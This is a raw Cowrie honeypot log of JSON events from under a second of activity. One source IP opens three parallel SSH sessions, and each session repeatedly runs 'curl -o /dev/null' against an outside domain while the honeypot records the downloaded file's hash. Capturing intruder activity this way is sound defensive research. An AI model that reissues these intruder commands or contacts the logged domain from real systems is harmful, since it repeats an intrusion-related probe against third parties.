{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.130016Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.131761Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.133603Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.175296Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.176311Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.181267Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.212977Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.214324Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.214827Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.217489Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.218425Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.260563Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.261597Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.264238Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.265234Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.270739Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.275256Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.307158Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.308061Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.313002Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.313584Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.316938Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.318103Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.321231Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.323843Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.348379Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.349210Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.354463Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.358290Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.359394Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.360110Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.365169Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.367074Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.385839Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.386884Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.393321Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.394003Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.398064Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.401390Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.418177Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.418882Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.426634Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.427542Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.448625Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.449341Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.452925Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.455440Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.458293Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.458980Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.462562Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.464580Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.467317Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.484813Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.485559Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.491973Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.492790Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.514347Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.515062Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.524267Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.525362Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.526491Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.532573Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.534387Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.535261Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.538476Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.564918Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.565712Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.569245Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.572344Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.573171Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.597082Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.603943Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.604731Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.608563Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.610126Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.611064Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.617927Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.621197Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:42.622631Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:42.623354Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
